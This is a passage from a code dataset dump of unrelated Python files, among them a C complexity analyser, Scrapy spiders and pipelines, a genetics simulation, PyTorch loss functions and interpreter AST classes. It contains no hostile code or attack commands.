PreMatch.objects.filter(start_date__lte=timezone.now()).delete()\r\n\r\n\r\n# class TestCron(CronJobBase):\r\n#     RUN_EVERY_MINS = 0.001\r\n#     schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\r\n#     code = 'ollo_mainapp.testcron'  # a unique code\r\n#\r\n#     def do(self):\r\n#\r\n","sub_path":"ollo_mainapp/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":25133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"652166777","text":"import re\nimport commentOutAnalysis as coa\nfrom enum import Enum\n\nclass state(Enum):\n    out = 1  # 関数外部\n    declare = 2  # 関数宣言状態\n    argList = 3  # 引数リスト\n    argListEd = 4  # 引数リスト終わり\n    inFunc = 5  # 関数内部\n\nlineSt = 0\nlineEd = 0xff\n\nParenthesesStRegex = '\\('\nParenthesesSt = re.compile(ParenthesesStRegex)\n\nParenthesesEdRegex = '\\)'\nParenthesesEd = re.compile(ParenthesesEdRegex)\n\nBracesStRegex = '\\{'\nBracesSt = re.compile(BracesStRegex)\n\nBracesEdRegex = '\\}'\nBracesEd = re.compile(BracesEdRegex)\n\nForLoopRegex = '^\\s*for(\\s+|\\()'\nForLoop = re.compile(ForLoopRegex)\n\nWhileLoopRegex = '^\\s*while(\\s+|\\()'\nWhileLoop = re.compile(WhileLoopRegex)\n\nIfJumpRegex = '^\\s*if(\\s+|\\()'\nIfJump = re.compile(IfJumpRegex)\n\nCaseJumpRegex = '^\\s*case(\\s+|\\()'\nCaseJump = re.compile(CaseJumpRegex)\n\nDefaultJumpRegex = '^\\s*default(\\s+|\\()'\nDefaultJump = re.compile(DefaultJumpRegex)\n\nIndentionOnlyRegex = '^\\s*$'\nIndentionOnly = re.compile(IndentionOnlyRegex)\n\nCommentOutRegex = '^\\s*(\\/\\*|\\/\\/)'\nCommentOut = re.compile(CommentOutRegex)\n\nclass funcAnalysis :\n\n    def __init__(self,funcName):\n        self.nest = 0\n        self.nestMax = 0\n        self.funcName = funcName\n        self.CyclomaticComplexity = 1\n        self.allSteps = 0\n        self.actualStep = 1\n\n    #循環的複雑度の計算\n    def calcCyclomaticComplexity(self,text,st,ed):\n        #Forループ探索\n        match = ForLoop.search(text,pos=st,endpos=ed)\n        if match is not None:\n            self.CyclomaticComplexity += 1\n\n        #Whileループ探索\n        match = WhileLoop.search(text,pos=st,endpos=ed)\n        if match is not None:\n            self.CyclomaticComplexity += 1\n\n        #If分岐探索\n        match = IfJump.search(text,pos=st,endpos=ed)\n        if match is not None:\n            self.CyclomaticComplexity += 1\n\n        #switch,case分岐探索\n        match = CaseJump.search(text,pos=st,endpos=ed)\n        if match is not None:\n            self.CyclomaticComplexity += 1\n\n\n\n    #波括弧終わり判定\n    def searchBrancesEd(self,text,st,ed):\n        match = BracesEd.search(text,pos=st,endpos=ed)\n        if match is None:\n            return False\n        #波括弧}あり\n        self.nest -= 1      #ネスト数マイナス\n        return True\n\n    #波括弧始まり判定\n    def searchBracesSt(self,text,st,ed):\n        match = BracesSt.search(text,pos=st,endpos=ed)\n        if match is None:\n            return False\n        #波括弧あり\n        self.nest += 1\n        tempNest = self.nest\n\n        if(tempNest > self.nestMax):\n            #最大ネストの更新\n            self.nestMax = tempNest\n        return True\n    #丸括弧始まり判定\n    def searchParenthesesSt(self,text,st,ed):\n        match = ParenthesesSt.search(text,pos=st,endpos=ed)\n        if match is not None:\n            return True\n        return False\n\n    #丸括弧終わり判定\n    def searchParenthesesEd(self,text,st,ed):\n        match = ParenthesesEd.search(text,pos=st,endpos=ed)\n        if match is not None:\n            #引数宣言リスト終了\n            return True\n        return False\n\n    def stateDeclareNoCommentOut(self,text):\n        #丸かっこを探す\n        ret = self.searchParenthesesSt(text,lineSt,lineEd)\n        if ret == False:\n            #状態に変更なし\n            return state.declare\n        #丸かっこの終りを探す\n        ret = self.searchParenthesesEd(text,lineSt,lineEd)\n        if ret == False:\n            return state.argList  #状態を引数リスト状態に変更\n        #波かっこの始まりを探す\n        ret = self.searchBracesSt(text,lineSt,lineEd)\n        if ret == False:\n            return state.argListEd    #引数リスト終了\n        else:\n            return state.inFunc       #関数内\n\n    def stateDeclareComment(self,text,coSt,coEd):\n        stRet = self.searchParenthesesSt(text,lineSt,coSt)\n        edRet = self.searchParenthesesSt(text,coEd,lineEd)\n        if stRet == False and edRet == False:\n            #\"(\"が見つからなかった場合\n            return state.declare\n        stRet = self.searchParenthesesEd(text,lineSt,coSt)\n        edRet = self.searchParenthesesEd(text,coEd ,lineEd)\n        if stRet == False and edRet == False:\n            #\")\"が見つからなかった場合\n            return state.argList\n        stRet = self.searchBracesSt(text,lineSt,coSt)\n        edRet = self.searchBrancesEd(text,coEd,lineEd)\n        if stRet == False and edRet == False:\n            #\"{\"が見つからなかった場合\n            return state.argListEd\n        else:\n            return state.inFunc\n\n\n    #関数宣言状態\n    def stateDeclareImpl(self,text,coSt=0xff,coEd=0xff):\n        #無効値判定\n        if (coSt == 0xff) and (coEd == 0xff):\n            #コメントアウトなしの場合\n            return self.stateDeclareNoCommentOut(text)\n        else:\n            #コメントアウトありの場合\n            return self.stateDeclareComment(text,coSt,coEd)\n\n    #引数リスト状態での処理(コメントアウトなし)\n    def stateArgListNoCommentOut(self,text):\n        ret = self.searchParenthesesEd(text,lineSt,lineEd)\n        if ret == False:\n            return state.argList\n        #波かっこの始まりを探す\n        ret = self.searchBracesSt(text,lineSt,lineEd)\n        if ret == False:\n            return state.argListEd\n        else:\n            return state.inFunc\n\n    #引数リスト状態での処理(コメントアウトあり)\n    def stateArgListComment(self,text,coSt,coEd):\n        stRet = self.searchParenthesesEd(text,lineSt,coSt)\n        edRet = self.searchParenthesesEd(text,coEd,lineEd)\n        if stRet == False and edRet == False:\n            #\")\"が見つからなかった場合\n            return state.argList\n        stRet = self.searchBracesSt(text,lineSt,coSt)\n        edRet = self.searchBrancesEd(text,coEd,lineEd)\n        if stRet == False and edRet == False:\n            #\"{\"が見つからなかった場合\n            return state.argListEd\n        else:\n            return state.inFunc\n\n    #引数リスト状態\n    def stateArgListImpl(self,text,coSt=0xff,coEd=0xff):\n        #無効値判定\n        if (coSt == 0xff) and (coEd == 0xff):\n            #コメントアウトなしの場合\n            return self.stateArgListNoCommentOut(text)\n        else:\n            #コメントアウトありの場合\n            return self.stateArgListComment(text,coSt,coEd)\n\n    #引数宣言終了状態(コメントアウトなし)\n    def stateArgListEdNocommentOut(self,text):\n        #波括弧の始まりを探す\n        ret = self.searchBracesSt(text,lineSt,lineEd)\n        if ret == True:\n            #複雑度計算\n            self.calcCyclomaticComplexity(text,lineSt,lineEd)\n\n            return state.inFunc\n        return state.argListEd\n\n    #引数宣言終了状態(コメントアウトあり)\n    def stateArgListEdComment(self,text,coSt,coEd):\n        stRet = self.searchBracesSt(text,lineSt,coSt)\n        edRet = self.searchBracesSt(text,coEd,lineSt)\n        if stRet == True or edRet == True:\n            #複雑度計算\n            self.calcCyclomaticComplexity(text,lineSt,coSt)\n            self.calcCyclomaticComplexity(text,coEd,lineEd)\n\n            return state.inFunc\n        return state.argListEd\n\n\n    #引数宣言終了状態\n    def stateArgListEdImpl(self,text,coSt=0xff,coEd=0xff):\n        #無効値判定\n        if (coSt == 0xff) and (coEd == 0xff):\n            #コメントアウトなしの場合\n            return self.stateArgListEdNocommentOut(text)\n        else:\n            #コメントアウトありの場合\n            return self.stateArgListEdComment(text,coSt,coEd)\n\n    #関数内状態(コメントアウトなし)\n    def stateInFuncNoCommentOut(self,text):\n        #複雑度計算\n        self.calcCyclomaticComplexity(text,lineSt,lineEd)\n        #波括弧の終りを探す\n        ret = self.searchBrancesEd(text,lineSt,lineEd)\n        if ret == True:\n            if self.nest == 0:\n                # ネスト数が0のとき\n                return state.out  # 関数外状態\n\n        #波括弧の始まりを探す\n        self.searchBracesSt(text,lineSt,lineEd)\n\n        return state.inFunc\n\n    #関数内状態(コメントアウトあり)\n    def stateInFuncComment(self,text,coSt,coEd):\n        #複雑度計算\n        self.calcCyclomaticComplexity(text,lineSt,coSt)\n        self.calcCyclomaticComplexity(text, coEd, lineEd)\n\n        #波括弧の始まりを探す\n        self.searchBracesSt(text,lineSt,coSt)\n        self.searchBracesSt(text,coEd,lineEd)\n        #波括弧の終りを探す\n        stRet = self.searchBrancesEd(text,lineSt,coSt)\n        edRet = self.searchBrancesEd(text,coEd,lineEd)\n        if stRet == False and edRet == False:\n            return state.inFunc\n\n        if self.nest == 0:\n            #ネスト数が0のとき\n            return state.out       #関数外状態\n\n        return state.inFunc\n\n\n\n    #関数内状態\n    def stateInFuncImpl(self,text,coSt=0xff,coEd=0xff):\n        if (coSt == 0xff) and (coEd == 0xff):\n            #コメントアウトなしの場合\n            return self.stateInFuncNoCommentOut(text)\n        else:\n            #コメントアウトありの場合\n            return self.stateInFuncComment(text,coSt,coEd)\n\n\n    #総ステップ数計算\n    def addAllSteps(self,state):\n        if state != state.out:\n            self.allSteps += 1\n\n    #実ステップ計算\n    def addActualSteps(self,funcState,commentState,text,coSt=0xff,coEd=0xff):\n        if funcState == state.out:\n            return\n        if commentState == coa.state.running:\n            return\n        match = CommentOut.search(text,pos=lineSt,endpos=lineEd)\n\n        if (match is not None):\n            return\n\n        match = IndentionOnly.search(text)\n        if match is None:\n            self.actualStep += 1\n\n\n\n    #関数を出た直後の処理\n    def stateOut(self):\n        print(\"関数名:\",self.funcName)\n        print(\"ネスト:\",self.nestMax)\n        print(\"循環的複雑度\",self.CyclomaticComplexity)\n        print(\"総ステップ数{}\".format(self.allSteps))\n        print(\"実ステップ数{}\".format(self.actualStep))\n        print(\"\")\n\n        #関数名、ネスト、循環的複雑度、総ステップ数、実ステップ数を応答\n        return self.funcName,self.nestMax,self.CyclomaticComplexity,self.allSteps,self.actualStep\n","sub_path":"funcAnalysis.py","file_name":"funcAnalysis.py","file_ext":"py","file_size_in_byte":10524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"222777346","text":"\n\nfrom xai.brain.wordbase.verbs._dismiss import _DISMISS\n\n#calss header\nclass _DISMISSING(_DISMISS, ):\n\tdef __init__(self,): \n\t\t_DISMISS.__init__(self)\n\t\tself.name = \"DISMISSING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"dismiss\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_dismissing.py","file_name":"_dismissing.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"161060898","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy.orm import sessionmaker\nfrom hansard.models import MP, Debate, SpokenContribution, Party, db_connect, create_table\nimport hansard.items\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass HansardPipeline(object):\n    def __init__(self):\n        engine = db_connect()\n        create_table(engine)\n        self.Session = sessionmaker(bind=engine)\n\n    def process_item(self, item, spider):\n        session = self.Session()\n        print(\"Attempting to add to DB\")\n\n        try:\n            if type(item) is hansard.items.MP:\n                mp = MP(**item)\n                try:\n                    session.add(mp)\n                    session.commit()\n                    print(\"Sucess!!\")\n                except:\n                    session.rollback()\n                    print(\"Failure...\")\n                finally:\n                    session.close()\n                    print(\"All done\")\n        except:\n            raise\n        return item","sub_path":"hansard/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"167847365","text":"from random import *\n#L1=population\nL1=[]\nL2=[]\nL3=[]\nL4=[]\n\nfor i in range(10):\n    r1=str(randint(0,1))\n#    print('r1[',i,']=',r1)\n    L1.append(r1)\nFemale=[]\nMale=[]\ndef population():\n    print('__________population vector_________')\n    for j in range(len(L1)):\n        if(L1[j]=='0'):\n          Male.append(L1[j])\n          print('L1[',j,']=',L1[j],',represents male')\n        elif(L1[j]=='1'):\n            Female.append(L1[j])\n            print('L1[',j,']=',L1[j],',represents female')\npopulation()       \n        \n#....................first allele...........................................#\n\nfor i in range(10):\n    r2=str(randint(0,1))\n    L2.append(r2)\nDominantallele_1st=[]\nRecessiveallele_1st=[]\nMallele1=[]\nFallele1=[]\nprint('_________first alleles_______')\nfor k in range(len(L1)):\n   # global k\n    if(L2[k]=='0'):\n      Recessiveallele_1st.append(L2[k])\n      print('L2[',k,']=',L2[k],',means recessive allele(20% prob)')\n    \n    elif(L2[k]=='1'):\n        Dominantallele_1st.append(L2[k])\n        print('L2[',k,']=',L2[k],',means dominant allele(80 % prob)')\n\n\n    \n#..........................second allele....................................#\nfor i in range(10):\n    r3=str(randint(0,1))\n    L3.append(r3)\nDominantallele_2nd=[]\nRecessiveallele_2nd=[]\nprint('_________second allele______')\nfor m in range(len(L1)):\n   # global m,j\n    if(L3[m]=='0'):\n          Recessiveallele_2nd.append(L3[m])\n          print('L3[',m,']=',L3[m],',means recessive allele(20% prob)')\n    elif(L3[m]=='1'):\n            Dominantallele_2nd.append(L3[m])\n            print('L3[',m,']=',L3[m],',means dominant allele(80 % prob)')\n       \n#......................insert N to the second allele of male................\n\nprint('population vector=',L1)\nprint(\"    allel2 before=\",L3)\nL5=[]\nL6=[]\nMMTX = []\nFMTX = []\nMallele2=[]\nFallele2=[]\n#MMTX1 = []\n#FMTX1 = []\n#L1=population vector,L2=allele1,L3=allele2 before,L3=allele2 after,L6=decision vector\nfor j in range(len(L1)):\n    if(L1[j]=='0'):\n        print('0 represents male so no 2nd allele')\n        L3[j]='N'\n       #L3[L3.index(L1[j])]='N'\n        #L3[L1.index(j)]='N'\n        #MMTX.append(L2[j], L3[j])\n        #MMTX1(L2[j],L3[j])\n        #MMTX1.append(L1[k])\n    if(L1[j]=='1'):\n         print('1 represents female,still 2nd allele exists')\n         #FMTX.append(L2[j], L3[j])\n         #FMTX1(L2[j],L3[j])\n         #FMTX1.append(L1[k])\n    try:\n        L5=int(L1[j])+int(L3[j]+int(L2[j]))\n        L6.append(L5)\n    except:\n        L6.append('N')\ndef decision():\n    for j in range(len(L1)):\n        if (L6[j]==0):\n            print('sum of PV and allele2nd is 0 so CB')\n        else:\n            print(\"sum of PV and allele2nd is not 0 so no CB\")    \n#print(\"    allel2 after=\",L3)\ndef seperate():\n    for j in range(len(L1)):\n        if(L1[j]=='0'):\n             Mallele1.append(L2[j])\n        elif(L1[j]=='1'):\n                Fallele1.append(L2[j])\n    for j in range(len(L1)):\n        if(L1[j]=='0'):\n             Mallele2.append(L3[j])\n        elif(L1[j]=='1'):\n                Fallele2.append(L3[j])    \ndef lists():\n    print(\"___________LIST of parent allele(MF) formation____________\")\n    list1=[L1,L3]\n    print(\"Genes=\",list1)\n##    Mallele1.sort()\n##    Mallele2.sort()\n##    Fallele1.sort()\n##    Fallele2.sort()\n##    Male.sort()\n##    Female.sort()\n    MaleFemalelist=[Male,Female]\n    male_al=[Mallele1,Mallele2]\n    female_al=[Fallele1,Fallele2]\n    print(\"MaleFemale_list=[Male],[Female]\")\n    print(\"MaleFemale_list=\",MaleFemalelist)\n    \n    print(\"male_al_list=[Mallele1],[Mallele2]\")\n    print(\"male_al_list=\",male_al)\n    print(\"female_al_list=[Fallele1],[Fallele2]\")\n    print(\"female_al_list=\",female_al)\ndef offspring():\n    try:\n            print(\"___________OFFSPRING formation____________\")\n            \n            try:\n                print(\"offspring created by allele1 of male and female\")\n                for i in range(len(L1)):\n                    mergeallele1=Mallele1[i]+'\\t'+Fallele1[i]\n                    print(\"'for'\",\"'Male'\",[i],\"'Female'\",[i],\"having pair=\",Male[i],Female[i],\"offspring\",[i],\"'mergeallele1(MF)='\",mergeallele1)\n                    \n            except:\n                print(\"offspring created by allele2 of male and female\")\n                for i in range(len(L1)):\n                    mergeallele2=Mallele2[i]+'\\t'+Fallele2[i]\n                    print(\"'for'\",\"'Male'\",[i],\"'Female'\",[i],\"having pair=\",Male[i],Female[i],\"offspring\",[i],\"'mergeallele2(MF)='\",mergeallele2)\n        \n                \n    except:\n        print(\"____offspring created successfully for new generation ____\")\n##    print(\"Male=\",Male)\n##    print(\"Female=\",Female)\n##    print(\"Mallele1=\",Mallele1)\n##    print(\"Fallele1=\",Fallele1)\n##    print(\"Mallele2=\",Mallele2)\n##    print(\"Fallele2=\",Fallele2)\n##    \n    \n#.................................................................\n\n\nprint('         allele 1st=',L2)\n#print('   Dominantallele_1st=',Dominantallele_1st)\n#print(' Recesssiveallele_1st=',Recessiveallele_1st)\nprint('in allele2 0 represents male so no 2nd allele and 1 represents female,still 2nd allele exists')\n#print('   Dominantallele_2nd=',Dominantallele_2nd)\n#print(' Recesssiveallele_2nd=',Recessiveallele_2nd)\n#print('population vector=',L1)\nprint('population vector=',L1)\nprint('   allele 2 after=',L3)\nprint('  decision vector=',L6)\ndecision()\nseperate()\nlists()\noffspring()\n#............creating 2D list\n#print(\"FMTX=\",FMTX)\n#print(\"MMTX=\",MMTX)\n\n","sub_path":"python genetics raw materials/project2 working offspring created.py","file_name":"project2 working offspring created.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"130065797","text":"import scrapy\n\n\nclass QuotesSpider(scrapy.Spider):\n    name = \"proxys\"\n\n    def start_requests(self):\n        urls = [\n                'http://www.kuaidaili.com/free/inha/1284'\n        ]\n        for url in urls:\n            yield scrapy.Request(url=url, callback=self.parse)\n\n    def parse(self, response):\n        proxys = response.css(\"tbody tr\")\n\n        for proxy in proxys:\n            yield{\n                'ip': proxy.css(\"td::text\")[0].extract(),\n                'port': proxy.css(\"td::text\")[1].extract(),\n            }\n\n        next_page = response.xpath(\".//div[@id='listnav']//a[@class]/../following-sibling::li[1]/a/@href\").extract()\n        if len(next_page) != 0:\n            next_page = next_page[0]\n            next_page = response.urljoin(next_page)\n            yield scrapy.Request(next_page,callback=self.parse) \n","sub_path":"python/scrapy/tutorial/tutorial/spiders/quotes_spider.py","file_name":"quotes_spider.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"623147038","text":"from typing import List, cast, NamedTuple, Iterable\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\nfrom custom_types import IStateDict\nfrom util import flatten_weight, split_state_dict\nimport pdb\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nITorchReturnTypeMax = NamedTuple('torch_return_type_max', [(\n    'indices', torch.Tensor), ('values', torch.Tensor)])\n\n\ndef _icc_loss(pred: torch.Tensor, helper_preds: List[torch.Tensor]):\n    kl_loss_helper = nn.KLDivLoss(reduction=\"batchmean\")\n    _sum = 0.0\n\n    for helper_pred in helper_preds:\n        _sum += kl_loss_helper(pred, helper_pred).float()\n\n    return _sum / len(helper_preds)\n\n\ndef _transform_onehot(tensor: torch.Tensor) -> torch.Tensor:\n    max_values = cast(torch.Tensor, torch.max(\n        tensor, dim=1, keepdim=True).values)\n    return (tensor >= max_values).float() - \\\n        torch.sigmoid(tensor - max_values).detach() + \\\n        torch.sigmoid(tensor - max_values)\n\n\ndef _calculate_pseudo_label(local_pred: torch.Tensor, helper_preds: List[torch.Tensor]):\n    _sum = torch.zeros_like(local_pred)\n    for pred in [local_pred, *helper_preds]:\n        one_hot = _transform_onehot(pred)\n        _sum += one_hot\n\n    return torch.argmax(_sum, dim=1)\n\n\ndef _consistency_regularization(\n    pred: torch.Tensor,\n    pred_noised: torch.Tensor,\n    helper_preds: List[torch.Tensor]\n):\n\n    pseudo_label = _calculate_pseudo_label(\n        pred_noised, helper_preds).type(torch.LongTensor).to(device)\n\n    pseudo_label_CE_loss = F.cross_entropy(\n        pred_noised, pseudo_label)\n    kl_loss = _icc_loss(pred, helper_preds)\n\n    return pseudo_label_CE_loss + kl_loss\n\n\ndef iccs_loss(\n    pred: torch.Tensor,\n    pred_noised: torch.Tensor,\n    helper_preds: List[torch.Tensor],\n    lambda_iccs: float\n):\n    return _consistency_regularization(pred, pred_noised, helper_preds) * lambda_iccs\n\n\ndef regularization_loss(sigma: Iterable[Parameter], psi: Iterable[Parameter], lambda_l1: float, lambda_l2: float):\n    sigma = list(sigma)\n    psi = list(psi)\n\n    loss = 0.0\n    for idx in range(len(sigma)):\n        loss += torch.sum(((sigma[idx] - psi[idx]) ** 2) * lambda_l2)\n        loss += torch.sum(torch.abs(psi[idx]) * lambda_l1)\n\n    return loss\n\n\ndef src_loss(local_last_feature_map: torch.Tensor, helper_last_feature_maps: List[torch.Tensor], mini_batch:int):\n    # mean_feature_map vs local_last_feature_map\n    \n    # mean_feature_map = torch.mean(helper_last_feature_maps)\n    shape = list(helper_last_feature_maps[0].size())\n    total_feature_map = torch.empty(shape).to(device)\n    for i in range(len(helper_last_feature_maps)):\n       total_feature_map.add(helper_last_feature_maps[i])\n       mean_feature_map = total_feature_map/len(helper_last_feature_maps)\n\n    A_local = torch.reshape(local_last_feature_map,(mini_batch,-1))\n    A_helper = torch.reshape(mean_feature_map,(mini_batch,-1))\n    \n    A_local_trans = torch.Tensor.transpose(A_local,0,1)\n    A_helper_trans = torch.Tensor.transpose(A_helper,0,1)\n\n    G1 = torch.mm(A_local, A_local_trans)\n    G2 = torch.mm(A_helper, A_helper_trans)\n    #shape1 = list(G1.size())\n    #R1_inner = torch.empty(shape1).to(device)\n\n    #shape2 = list(G2.size())\n    #R2_inner = torch.empty(shape2).to(device)\n    R1 = G1 * 1/G1.norm(dim = 1).reshape(-1,1)\n    R2 = G2 * 1/G2.norm(dim = 1).reshape(-1,1)\n    # list1 = []\n    # for i in range(mini_batch):\n    #     #G1[i] = torch.unsqueeze(G1[i],0)\n    #     #G1[i] = torch.unsqueeze(G1[i],0)\n    #     print(G1[i].size())\n    #     G1_norm = F.normalize(G1[i], p=2.0, dim=1)  #, eps=1e-12, out=None\n    #     G1_fraction = torch.div(G1[i],G1_norm)\n    #     list1.append(G1_fraction)\n    #     if i == mini_batch:\n    #         R1_inner = list1\n\n    # list2 = []\n    # for i in range(mini_batch):\n    #     #G2[i] = torch.unsqueeze(G2[i],0)\n    #     #G2[i] = torch.unsqueeze(G2[i],0)\n    #     G2_norm = F.normalize(G2[i], p=2.0, dim=1) #, p=2.0, dim=1, eps=1e-12, out=None\n    #     G2_fraction = torch.div(G2[i],G2_norm)\n    #     list2.append(G2_fraction)\n    #     if i == mini_batch:\n    #         R2_inner = list2   \n\n    # R1 = torch.Tensor.transpose(R1_inner,0,1)\n    # R2 = torch.Tensor.transpose(R2_inner,0,1)\n\n    # mse of R1 & R2: sqrt[ (R1-R2) **2 ]\n    return F.mse_loss(R1, R2) ","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"311898468","text":"# AST\n\nclass ExprAST:\n    '''\n    这是所有 表达式AST 的父类\n    '''\n    pass\n\n\nclass ArgListAST:\n    '''\n    arg_list := expr [',' expr]*\n    '''\n\n    def __init__(self, exp_list :list, ln :int):\n        self.exp_list = exp_list\n        self.ln = ln\n\n\nclass CellAST:\n    '''\n    cell := NUMBER | NAME | STRING | call_expr\n    '''\n\n    def __init__(self, value :object, _type :int, ln :int):\n        self.value = value\n        self.type = _type\n        self.ln = ln\n\n    def __str__(self):\n        return '' % self.value\n\n    __repr__ = __str__\n\n\nclass MemberAccessAST:\n    def __init__(self, left :CellAST, members :CellAST, ln :int):\n        self.left = left\n        self.members = members\n        self.ln = ln\n\n\nclass PowerExprAST:\n    '''\n    pow_expr := member_expr ['^' member_expr]\n    '''\n\n    def __init__(self, left :MemberAccessAST, right :MemberAccessAST, ln :int):\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass ModExprAST:\n    '''\n    mod_expr := pow_expr ['MOD' pow_expr]\n    '''\n    def __init__(self, left :PowerExprAST, right :PowerExprAST, ln :int):\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass MuitDivExprAST:\n    '''\n    md_expr := mod_expr [('*' | '/') mod_expr]\n    '''\n    def __init__(self, op :str, left :ModExprAST, right :ModExprAST, ln :int):\n        self.op = op\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass BinaryExprAST:\n    '''\n    real_expr := md_expr [('+' | '-') md_expr]* | '(' real_expr ')'\n    '''\n    def __init__(self, op :str, left :MuitDivExprAST, right :MuitDivExprAST, ln :int):\n        self.op = op\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass CallExprAST:\n    '''\n    call_expr := NAME '(' arg_list ')'\n    '''\n\n    def __init__(self, left :BinaryExprAST, arg_list :ArgListAST, ln :int):\n        self.left = left\n        self.arg_list = arg_list\n        self.ln = ln\n\n\nclass ValueListAST:\n    '''\n    val_list := NAME [',' NAME]\n    '''\n    def __init__(self, v_list :list, ln :int):\n        self.value_list = v_list\n        self.ln = ln\n\n    def __str__(self):\n        return '' % str(self.v_list)\n\n\nclass AssignExprAST(ExprAST):\n    '''\n    assi_expr := cell '=' expr NEWLINE\n    '''\n    def __init__(self, left :BinaryExprAST, value :ExprAST, ln :int):\n        self.value = value\n        self.left = left\n        self.ln = ln\n\n\nclass DefineExprAST(ExprAST):\n    '''\n    def_expr := NAME '=' expr NEWLINE\n    '''\n    def __init__(self, name :str, value :ExprAST, ln :int):\n        self.value = value\n        self.name = name\n        self.ln = ln\n\n\nclass PrintExprAST(ExprAST):\n    '''\n    print_expr := 'PRINT' expr [';' expr]* NEWLINE\n    '''\n    def __init__(self, value_list :list, ln :int):\n        self.value_list = value_list\n        self.ln = ln\n\n\nclass InputExprAST(ExprAST):\n    '''\n    input_expr := 'INPUT' expr ';' val_list NEWLINE\n    '''\n    def __init__(self, msg :ExprAST, val_list :ValueListAST, ln :int):\n        self.msg = msg\n        self.value_list = val_list\n        self.ln = ln\n\n\nclass CmpTestAST:\n    '''\n    cmp_test := expr [cmp_op expr]*\n    '''\n    def __init__(self, left :ExprAST, right :list, ln :int):\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass AndTestAST:\n    '''\n    and_test := cmp_test ['and' cmp_test]\n    '''\n    def __init__(self, left :CmpTestAST, right :list, ln :int):\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass OrTestAST:\n    '''\n    or_test := and_test ['or' and_test]*\n    '''\n    def __init__(self, left :AndTestAST, right :list, ln :int):\n        self.left = left\n        self.right = right\n        self.ln = ln\n\n\nclass TestExprAST:\n    '''\n    test := or_test\n    '''\n    def __init__(self, test :OrTestAST, ln :int):\n        self.test = test\n        self.ln = ln\n\n\nclass BlockExprAST:\n    '''\n    BLOCK := stmt*\n    '''\n    def __init__(self, stmts :list, ln :int):\n        self.stmts = stmts\n        self.ln = ln\n\n\nclass IfExprAST:\n    '''\n    if_else_expr := 'if' test 'then' NEWLINE\n                BLOK\n                (\n                 'else' NEWLINE\n                 BLOCK\n                )\n                'endif'\n    '''\n\n    def __init__(self, test :TestExprAST, \n            block :BlockExprAST, else_block :BlockExprAST, ln :int):\n        self.test = test\n        self.block = block\n        self.else_block = else_block\n        self.ln = ln\n\n\nclass WhileExprAST:\n    '''\n    while_expr := 'while' test 'then'\n        BLOCK\n        'wend' NEWLINE'\n    '''\n\n    def __init__(self, test :TestExprAST, block :BlockExprAST, ln :int):\n        self.test = test\n        self.block = block\n        self.ln = ln\n\n\nclass DoLoopExprAST:\n    '''\n    do_loop_expr := 'do' 'NEWLINE\n                BLOCK\n                'loop' 'until' test NEWLINE\n    '''\n\n    def __init__(self, test :TestExprAST, block :BlockExprAST, ln :int):\n        self.test = test\n        self.block = block\n        self.ln = ln\n\n\n\nclass FunctionDefineAST:\n    '''\n    func_def := 'fun' NAME '(' arg_list ')' NEWLINE\n                BLOCK\n            'end'\n    '''\n\n    def __init__(self, name :str, arg_list :ArgListAST, block :BlockExprAST, ln :int):\n        self.name = name\n        self.arg_list = arg_list\n        self.block = block\n        self.ln = ln\n\n\nclass ReturnAST:\n    '''\n    return_stmt := 'return' expr\n    '''\n\n    def __init__(self, expr :ExprAST, ln :int):\n        self.expr = expr\n        self.ln = ln\n\n\nclass ContinueAST:\n    '''\n    continue_stmt := 'continue'\n    '''\n    def __init__(self, ln :int):\n        self.ln = ln\n\n\nclass BreakAST:\n    '''\n    break_stmt := 'break'\n    '''\n    def __init__(self, ln :int):\n        self.ln = ln\n\n\nclass NullLineAST:\n    '''\n    null_line := NEWLINE\n    '''\n    def __init__(self, ln :int):\n        self.ln = ln\n\n\nclass EOFAST:\n    def __init__(self, ln :int):\n        self.ln = ln\n\n\nclass ItemListAST:\n    def __init__(self, item_list :list, ln :int):\n        self.item_list = item_list\n        self.ln = ln\n\n\nclass ArrayAST:\n    def __init__(self, items :ItemListAST, ln :int):\n        self.items = items\n        self.ln = ln\n\n\nclass SubscriptExprAST:\n    def __init__(self, left :BinaryExprAST, expr :BinaryExprAST, ln :int):\n        self.expr = expr\n        self.left = left\n        self.ln = ln\n\n\nclass LoadAST:\n    def __init__(self, name :str, ln :int):\n        self.name = name\n        self.ln = ln\n\n\nclass StructDefineAST:\n    def __init__(self, name :str, name_list :list, protected_list :list, ln :int):\n        self.name = name\n        self.name_list = name_list\n        self.protected_list = protected_list\n        self.ln = ln\n\n\nclass NotTestAST:\n    def __init__(self, expr :CmpTestAST, ln):\n        self.expr = expr\n        self.ln = ln\n\n\nclass AssignExprListAST:\n    def __init__(self, expr_list :list, ln):\n        self.expr_list = expr_list\n        self.ln = 